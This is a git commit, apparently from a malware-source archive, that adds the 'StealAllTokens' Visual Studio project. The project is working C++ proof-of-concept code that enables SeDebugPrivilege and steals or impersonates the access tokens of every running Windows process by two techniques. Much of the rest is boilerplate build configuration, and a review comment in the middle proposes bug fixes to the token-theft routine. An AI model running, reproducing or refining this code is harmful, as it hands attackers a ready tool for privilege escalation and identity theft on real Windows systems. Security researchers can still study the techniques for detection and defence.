updates and moves

n/a
vxunderground
2022-04-11 20:00:13 -05:00
parent 1275ea2e03
commit 900263ea6f
809 changed files with 149115 additions and 1594 deletions
@@ -0,0 +1,63 @@
###############################################################################
# Set default behavior to automatically normalize line endings.
###############################################################################
* text=auto
###############################################################################
# Set default behavior for command prompt diff.
#
# This is need for earlier builds of msysgit that does not have it on by
# default for csharp files.
# Note: This is only used by command line
###############################################################################
#*.cs diff=csharp
###############################################################################
# Set the merge driver for project and solution files
#
# Merging from the command prompt will add diff markers to the files if there
# are conflicts (Merging from VS is not affected by the settings below, in VS
# the diff markers are never inserted). Diff markers may cause the following
# file extensions to fail to load in VS. An alternative would be to treat
# these files as binary and thus will always conflict and require user
# intervention with every merge. To do so, just uncomment the entries below
###############################################################################
#*.sln merge=binary
#*.csproj merge=binary
#*.vbproj merge=binary
#*.vcxproj merge=binary
#*.vcproj merge=binary
#*.dbproj merge=binary
#*.fsproj merge=binary
#*.lsproj merge=binary
#*.wixproj merge=binary
#*.modelproj merge=binary
#*.sqlproj merge=binary
#*.wwaproj merge=binary
###############################################################################
# behavior for image files
#
# image files are treated as binary by default.
###############################################################################
#*.jpg binary
#*.png binary
#*.gif binary
###############################################################################
# diff behavior for common document formats
#
# Convert binary document formats to text before diffing them. This feature
# is only available from the command line. Turn it on by uncommenting the
# entries below.
###############################################################################
#*.doc diff=astextplain
#*.DOC diff=astextplain
#*.docx diff=astextplain
#*.DOCX diff=astextplain
#*.dot diff=astextplain
#*.DOT diff=astextplain
#*.pdf diff=astextplain
#*.PDF diff=astextplain
#*.rtf diff=astextplain
#*.RTF diff=astextplain
@@ -0,0 +1,340 @@
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
##
## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
# User-specific files
*.rsuser
*.suo
*.user
*.userosscache
*.sln.docstates
# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs
# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
[Aa][Rr][Mm]/
[Aa][Rr][Mm]64/
bld/
[Bb]in/
[Oo]bj/
[Ll]og/
# Visual Studio 2015/2017 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/
# Visual Studio 2017 auto generated files
Generated\ Files/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
# NUNIT
*.VisualState.xml
TestResult.xml
# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c
# Benchmark Results
BenchmarkDotNet.Artifacts/
# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/
# StyleCop
StyleCopReport.xml
# Files built by Visual Studio
*_i.c
*_p.c
*_h.h
*.ilk
*.meta
*.obj
*.iobj
*.pch
*.pdb
*.ipdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*_wpftmp.csproj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc
# Chutzpah Test files
_Chutzpah*
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb
# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap
# Visual Studio Trace Files
*.e2e
# TFS 2012 Local Workspace
$tf/
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user
# JustCode is a .NET coding add-in
.JustCode
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# AxoCover is a Code Coverage Tool
.axoCover/*
!.axoCover/settings.json
# Visual Studio code coverage results
*.coverage
*.coveragexml
# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*
# MightyMoose
*.mm.*
AutoTest.Net/
# Web workbench (sass)
.sass-cache/
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# Note: Comment the next line if you want to checkin your web deploy settings,
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj
# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/
# NuGet Packages
*.nupkg
# The packages folder can be ignored because of Package Restore
**/[Pp]ackages/*
# except build/, which is used as an MSBuild target.
!**/[Pp]ackages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/[Pp]ackages/repositories.config
# NuGet v3's project.json files produces more ignorable files
*.nuget.props
*.nuget.targets
# Microsoft Azure Build Output
csx/
*.build.csdef
# Microsoft Azure Emulator
ecf/
rcf/
# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt
*.appx
# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!?*.[Cc]ache/
# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
*.pfx
*.publishsettings
orleans.codegen.cs
# Including strong name files can present a security risk
# (https://github.com/github/gitignore/pull/2483#issue-259490424)
#*.snk
# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
ServiceFabricBackup/
*.rptproj.bak
# SQL Server files
*.mdf
*.ldf
*.ndf
# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
*.rptproj.rsuser
*- Backup*.rdl
# Microsoft Fakes
FakesAssemblies/
# GhostDoc plugin setting file
*.GhostDoc.xml
# Node.js Tools for Visual Studio
.ntvs_analysis.dat
node_modules/
# Visual Studio 6 build log
*.plg
# Visual Studio 6 workspace options file
*.opt
# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
*.vbw
# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions
# Paket dependency manager
.paket/paket.exe
paket-files/
# FAKE - F# Make
.fake/
# JetBrains Rider
.idea/
*.sln.iml
# CodeRush personal settings
.cr/personal
# Python Tools for Visual Studio (PTVS)
__pycache__/
*.pyc
# Cake - Uncomment if you are using it
# tools/**
# !tools/packages.config
# Tabs Studio
*.tss
# Telerik's JustMock configuration file
*.jmconfig
# BizTalk build output
*.btp.cs
*.btm.cs
*.odx.cs
*.xsd.cs
# OpenCover UI analysis results
OpenCover/
# Azure Stream Analytics local run output
ASALocalRun/
# MSBuild Binary and Structured Log
*.binlog
# NVidia Nsight GPU debugger configuration file
*.nvuser
# MFractors (Xamarin productivity tool) working folder
.mfractor/
# Local History for Visual Studio
.localhistory/
# BeatPulse healthcheck temp database
healthchecksdb
Binary file not shown.


@@ -0,0 +1,15 @@
# StealAllTokens
This PoC uses two diferent technics for stealing the primary token from all running processes, showing that is possible to impersonate and use whatever token present at any process
![](Img/TI.png)
# Blogpost
# Credits
* https://posts.specterops.io/understanding-and-defending-against-access-token-theft-finding-alternatives-to-winlogon-exe-80696c8a73b
* https://github.com/lab52io/StopDefender
* https://www.mcafee.com/enterprise/en-us/assets/reports/rp-access-token-theft-manipulation-attacks.pdf
* http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FThread%2FNtImpersonateThread.html
* https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html
@@ -0,0 +1,41 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30717.126
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "StealAllTokens", "StealAllTokens\StealAllTokens.vcxproj", "{BB0B2B1E-70D4-4412-8AEC-D1D5DF0594FA}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "StealMachineAccount", "StealMachineAccount\StealMachineAccount.vcxproj", "{20A29CEF-6648-44AC-8B28-B3C362926D3B}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BB0B2B1E-70D4-4412-8AEC-D1D5DF0594FA}.Debug|x64.ActiveCfg = Debug|x64
{BB0B2B1E-70D4-4412-8AEC-D1D5DF0594FA}.Debug|x64.Build.0 = Debug|x64
{BB0B2B1E-70D4-4412-8AEC-D1D5DF0594FA}.Debug|x86.ActiveCfg = Debug|Win32
{BB0B2B1E-70D4-4412-8AEC-D1D5DF0594FA}.Debug|x86.Build.0 = Debug|Win32
{BB0B2B1E-70D4-4412-8AEC-D1D5DF0594FA}.Release|x64.ActiveCfg = Release|x64
{BB0B2B1E-70D4-4412-8AEC-D1D5DF0594FA}.Release|x64.Build.0 = Release|x64
{BB0B2B1E-70D4-4412-8AEC-D1D5DF0594FA}.Release|x86.ActiveCfg = Release|Win32
{BB0B2B1E-70D4-4412-8AEC-D1D5DF0594FA}.Release|x86.Build.0 = Release|Win32
{20A29CEF-6648-44AC-8B28-B3C362926D3B}.Debug|x64.ActiveCfg = Debug|x64
{20A29CEF-6648-44AC-8B28-B3C362926D3B}.Debug|x64.Build.0 = Debug|x64
{20A29CEF-6648-44AC-8B28-B3C362926D3B}.Debug|x86.ActiveCfg = Debug|Win32
{20A29CEF-6648-44AC-8B28-B3C362926D3B}.Debug|x86.Build.0 = Debug|Win32
{20A29CEF-6648-44AC-8B28-B3C362926D3B}.Release|x64.ActiveCfg = Release|x64
{20A29CEF-6648-44AC-8B28-B3C362926D3B}.Release|x64.Build.0 = Release|x64
{20A29CEF-6648-44AC-8B28-B3C362926D3B}.Release|x86.ActiveCfg = Release|Win32
{20A29CEF-6648-44AC-8B28-B3C362926D3B}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {CD0BF4B4-CBDF-4265-8CD0-75DC4A850570}
EndGlobalSection
EndGlobal
@@ -0,0 +1,454 @@
/********************************************************************
* StealAllTokens: This PoC uses two diferent technics for stealing
* the primary token from all running processes, showing that is possible
* to impersonate and use whatever token present at any process.
*
* NOTE: We consider that source process has local Admnin privs and
* has High integrity (no SYSTEM account needed)
*********************************************************************/
#include <windows.h>
#include <iostream>
#include <cstdio>
#include <tlhelp32.h>
#include <Lmcons.h>
#include <psapi.h>
#define MAX_NAME 256
BOOL SetPrivilege(
HANDLE hToken, // access token handle
LPCTSTR lpszPrivilege, // name of privilege to enable/disable
BOOL bEnablePrivilege // to enable or disable privilege
)
{
TOKEN_PRIVILEGES tp;
LUID luid;
if (!LookupPrivilegeValue(
NULL, // lookup privilege on local system
lpszPrivilege, // privilege to lookup
&luid)) // receives LUID of privilege
{
printf("[-] LookupPrivilegeValue error: %u\n", GetLastError());
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
// Enable the privilege or disable all privileges.
if (!AdjustTokenPrivileges(
hToken,
FALSE,
&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES)NULL,
(PDWORD)NULL))
{
printf("[-] AdjustTokenPrivileges error: %u\n", GetLastError());
return FALSE;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
{
printf("[-] The token does not have the specified privilege. \n");
return FALSE;
}
return TRUE;
}
std::string get_username()
{
TCHAR username[UNLEN + 1] = {0};
DWORD username_len = UNLEN + 1;
int res = GetUserName(username, &username_len);
std::wstring username_w(username);
std::string username_s(username_w.begin(), username_w.end());
return username_s;
}
HANDLE ListProcessThreads(DWORD dwOwnerPID)
{
HANDLE hThreadSnap = INVALID_HANDLE_VALUE;
THREADENTRY32 te32;
// Take a snapshot of all running threads
hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if (hThreadSnap == INVALID_HANDLE_VALUE)
return(FALSE);
// Fill in the size of the structure before using it.
te32.dwSize = sizeof(THREADENTRY32);
// Retrieve information about the first thread,
// and exit if unsuccessful
if (!Thread32First(hThreadSnap, &te32))
{
printf("[-] Error Thread32First\n"); // Show cause of failure
CloseHandle(hThreadSnap); // Must clean up the snapshot object!
return(NULL);
}
// Trying to open a thread
do
{
if (te32.th32OwnerProcessID == dwOwnerPID)
{
HANDLE thandle = OpenThread(THREAD_DIRECT_IMPERSONATION,
TRUE,
te32.th32ThreadID
);
CloseHandle(hThreadSnap);
if (thandle == NULL) {
printf("[-] OpenThread failed\n");
return (NULL);
}
else {
printf("[+] OpenThread 0x%08X success!\n", te32.th32ThreadID);
return (thandle);
}
}
} while (Thread32Next(hThreadSnap, &te32));
printf("[-] Process not found\n");
return (NULL);
}
BOOL GetTokenServiceName(HANDLE hToken, LPSTR lpName, LPSTR lpDomain) {
DWORD i, dwSize = 0, dwResult = 0;
PTOKEN_GROUPS pGroupInfo;
SID_NAME_USE SidType;
// Call GetTokenInformation to get the buffer size.
if (!GetTokenInformation(hToken, TokenGroups, NULL, dwSize, &dwSize))
{
dwResult = GetLastError();
if (dwResult != ERROR_INSUFFICIENT_BUFFER) {
printf("[-] GetTokenInformation Error %u\n", dwResult);
return FALSE;
}
}
// Allocate the buffer.
pGroupInfo = (PTOKEN_GROUPS)GlobalAlloc(GPTR, dwSize);
// Call GetTokenInformation again to get the group information.
if (!GetTokenInformation(hToken, TokenGroups, pGroupInfo,
dwSize, &dwSize))
{
printf("[-] GetTokenInformation Error %u\n", GetLastError());
return FALSE;
}
// Loop through the group SIDs looking for the administrator SID.
for (i = 0; i < pGroupInfo->GroupCount; i++)
{
// Lookup the account name and print it.
dwSize = MAX_NAME;
if (!LookupAccountSidA(NULL, pGroupInfo->Groups[i].Sid,
lpName, &dwSize, lpDomain,
&dwSize, &SidType))
{
dwResult = GetLastError();
if (dwResult == ERROR_NONE_MAPPED)
strcpy_s(lpName, dwSize, "NONE_MAPPED");
else
{
printf("[-] LookupAccountSid Error %u\n", GetLastError());
return FALSE;
}
}
// This Token has as service group
if (strcmp(lpDomain, "NT SERVICE") == 0)
return true;
}
if (pGroupInfo)
GlobalFree(pGroupInfo);
return FALSE;
}
/********************************************************************
* Technique1: Good technique for PPL processes with relaxed token DACLS
* Uses->
* OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION)
* OpenProcessToken(TOKEN_DUPLICATE | TOKEN_QUERY)
* ImpersonateLoggedOnUser()
*
*********************************************************************/
bool Technique1(int pid) {
// Initialize variables and structures
HANDLE tokenHandle = NULL;
DWORD bsize = 1024;
CHAR buffer[1024] = {0};
HANDLE currentTokenHandle = NULL;
char lpServiceName[MAX_NAME] = { 0 };
char lpServiceDomain[MAX_NAME] = { 0 };
/*
// Add SE debug privilege
BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &currentTokenHandle);
if (SetPrivilege(currentTokenHandle, L"SeDebugPrivilege", TRUE))
{
printf("[+] SeDebugPrivilege enabled!\n");
}
else {
printf("[-] SeDebugPrivilege not enabled!\n");
exit(1);
}
*/
// Call OpenProcess() to open, print return code and error code
SetLastError(NULL);
HANDLE processHandle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, true, pid);
if (GetLastError() == NULL) {
//Get process image name
QueryFullProcessImageNameA((HMODULE)processHandle, 0, buffer, &bsize);
if (GetLastError() != NULL)
{
printf("[-] Technique1 QueryFullProcessImageNameA Pid %i Error: %i\n", pid, GetLastError());
SetLastError(NULL);
}
printf("[+] Technique1 OpenProcess() %s success!\n", buffer);
}
else
{
printf("[-] Technique1 OpenProcess() Pid %i Error: %i\n", pid, GetLastError());
return false;
}
// Call OpenProcessToken(), print return code and error code
bool getToken = OpenProcessToken(processHandle, TOKEN_DUPLICATE | TOKEN_QUERY, &tokenHandle);
if (getToken != 0)
printf("[+] Technique1 OpenProcessToken() %s success!\n", buffer);
else
{
printf("[-] Technique1 OpenProcessToken() %s Return Code: %i\n", buffer, getToken);
printf("[-] Technique1 OpenProcessToken() %s Error: %i\n", buffer, GetLastError());
CloseHandle(processHandle);
return false;
}
// Impersonate user in a thread
bool impersonateUser = ImpersonateLoggedOnUser(tokenHandle);
if (GetLastError() == NULL)
{
printf("[+] Technique1 ImpersonatedLoggedOnUser() success!\n");
printf("[+] Current user is: %s\n", (get_username()).c_str());
//Case SvcHost getting Service name
if (GetTokenServiceName(tokenHandle, lpServiceName, lpServiceDomain)) {
printf("Technique1|%s|%s|%s\n", buffer, (get_username()).c_str(), lpServiceName);
}
else {
printf("Technique1|%s|%s|\n", buffer, (get_username()).c_str());
}
}
else
{
printf("[-] Technique1 ImpersonatedLoggedOnUser() Return Code: %i\n", getToken);
printf("[-] Technique1 ImpersonatedLoggedOnUser() Error: %i\n", GetLastError());
CloseHandle(processHandle);
CloseHandle(tokenHandle);
return false;
}
CloseHandle(processHandle);
CloseHandle(tokenHandle);
return true;
}
/********************************************************************
* Technique2: Good technique for those processes with a very restrictive
* open Token DACLs (Most of the Svchost processes)
* Uses->
* OpenProcess(PROCESS_QUERY_INFORMATION)
* ListProcessThreads()
* NtImpersonateThread()
*
*********************************************************************/
bool Technique2(int pid) {
SECURITY_QUALITY_OF_SERVICE sqos = {};
sqos.Length = sizeof(sqos);
sqos.ImpersonationLevel = SecurityImpersonation;
//sqos.ImpersonationLevel = SecurityIdentification;
DWORD bsize = 1024;
CHAR buffer[1024];
HANDLE currentTokenHandle = NULL;
char lpServiceName[MAX_NAME] = { 0 };
char lpServiceDomain[MAX_NAME] = { 0 };
HANDLE TokenHandle = NULL;;
// Add SE debug privilege
BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &currentTokenHandle);
if (SetPrivilege(currentTokenHandle, L"SeDebugPrivilege", TRUE))
{
printf("[+] SeDebugPrivilege enabled!\n");
}
else {
printf("[-] SeDebugPrivilege not enabled!\n");
exit(1);
}
// Call OpenProcess(), print return code and error code
HANDLE processHandle = OpenProcess(PROCESS_QUERY_INFORMATION, true, pid);
if (GetLastError() == NULL) {
//Get process image name
QueryFullProcessImageNameA((HMODULE)processHandle, 0, buffer, &bsize);
if (GetLastError() != NULL)
{
printf("[-] Technique2 QueryFullProcessImageNameA Pid %i Error: %i\n", pid, GetLastError());
return false;
}
printf("[+] Technique2 OpenProcess() %s success with pid %i !\n", buffer, pid);
}
else
{
printf("[-] Technique2 OpenProcess() Pid %i Error: %i\n", pid, GetLastError());
return false;
}
//Get handle from first process thread
HANDLE hThreadToImpersonate = ListProcessThreads(pid);
if (hThreadToImpersonate == NULL)
{
printf("[-] Technique2 Error getting pthread\n");
return false;
}
//Calling NativeAPI NtImpersonateThread
typedef NTSTATUS __stdcall NtImpersonateThread(HANDLE ThreadHandle,
HANDLE ThreadToImpersonate,
PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService);
NtImpersonateThread* fNtImpersonateThread =
(NtImpersonateThread*)GetProcAddress(GetModuleHandle(L"ntdll"),
"NtImpersonateThread");
// Impersonate user in a thread
BOOL impersonateUser = fNtImpersonateThread(GetCurrentThread(), hThreadToImpersonate, &sqos);
if (GetLastError() == NULL)
{
printf("[+] Technique2 fNtImpersonateThread() %s success!\n", buffer);
printf("[+] Technique2 Current user is: %s\n", (get_username()).c_str());
if (!OpenThreadToken(GetCurrentThread(), TOKEN_QUERY, FALSE, &TokenHandle)) {
printf("[-] OpenThreadToken() Error: %i\n", GetLastError());
printf("Technique2|%s|%s|\n", buffer, (get_username()).c_str());
}
else {
//Case SvcHost getting Service name
printf("[+] OpenThreadToken() Success!\n");
if (GetTokenServiceName(TokenHandle, lpServiceName, lpServiceDomain)) {
printf("Technique2|%s|%s|%s\n", buffer, (get_username()).c_str(), lpServiceName);
}
else {
printf("Technique2|%s|%s|\n", buffer, (get_username()).c_str());
}
CloseHandle(TokenHandle);
}
}
else
{
printf("[-] ImpersonatedLoggedOnUser() Error: %i\n", GetLastError());
}
// Closing not necessary handles
CloseHandle(hThreadToImpersonate);
CloseHandle(processHandle);
return true;
}
int main(int argc, char** argv) {
DWORD aProcesses[1024], cbNeeded, cProcesses;
int HardenedProcessesCount = 0;
int HardenedProcesses[100] = { 0 };
int TotalTechnique1 = 0;
int TotalTechnique2 = 0;
printf("[+] Current user is: %s\n", (get_username()).c_str());
//Get pid list
if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded))
{
printf("[-] Can't enumerate processes");
exit(1);
}
// Calculate how many process identifiers were returned.
cProcesses = cbNeeded / sizeof(DWORD);
// Get process list and try to steal all tokens
for (int i = 0; i < cProcesses; i++)
{
if (aProcesses[i] != 0 && aProcesses[i] !=4)
{
if (Technique1(aProcesses[i])) {
RevertToSelf();
printf("[+] Reverting thread Current user is: %s\n", (get_username()).c_str());
TotalTechnique1++;
}
else {
printf("[-] Technique 1 failed\n\n");
printf("[+] Trying Technique 2\n");
if (Technique2(aProcesses[i])) {
RevertToSelf();
printf("[+] Reverting thread Current user is: %s\n", (get_username()).c_str());
TotalTechnique2++;
}
else {
printf("[-] Can't steal token from process pid %i\n", aProcesses[i]);
HardenedProcesses[HardenedProcessesCount] = aProcesses[i];
HardenedProcessesCount++;
//exit(1);
}
};
printf("\n");
}
Sleep(100);
}
//Listing processes that we couldn't open it
for (int j = 0; j < HardenedProcessesCount; j++) {
printf("[+] PIDs Hardened: %i\n", HardenedProcesses[j]);
}
printf("\n[+] Total processes: %i\n", cProcesses);
printf("[+] Total stolen tokens with Technique1: %i\n", TotalTechnique1);
printf("[+] Total stolen tokens with Technique2: %i\n", TotalTechnique2);
printf("[+] Total PIDs hardened: %i\n", HardenedProcessesCount);
printf("[+] Total PIDs stolen: %i\n", cProcesses - HardenedProcessesCount);
return 0;
}
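Review bot: In `main`, `HardenedProcesses` is declared with 100 slots, but `HardenedProcesses[HardenedProcessesCount] = aProcesses[i];` is written without a bounds check while `aProcesses` can hold up to 1024 PIDs, so a host where more than 100 PIDs fail both techniques writes past the end of the stack array. Size it to match the PID buffer, `int HardenedProcesses[1024] = { 0 };`, or guard the store with `if (HardenedProcessesCount < 100)`. Separately, `GetTokenServiceName` frees `pGroupInfo` only on the fall-through path: the `return true` on the "NT SERVICE" match and both `return FALSE` paths after `GlobalAlloc` leak the buffer, and the `GlobalAlloc` result is never checked for NULL before the second `GetTokenInformation` call. The same function passes `&dwSize` as both the name length and the domain length to `LookupAccountSidA`, so the two output sizes alias one variable; separate `DWORD`s initialised to `MAX_NAME` would keep the later `strcpy_s(lpName, dwSize, ...)` bound meaningful.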
@@ -0,0 +1,147 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{bb0b2b1e-70d4-4412-8aec-d1d5df0594fa}</ProjectGuid>
<RootNamespace>StealAllTokens</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
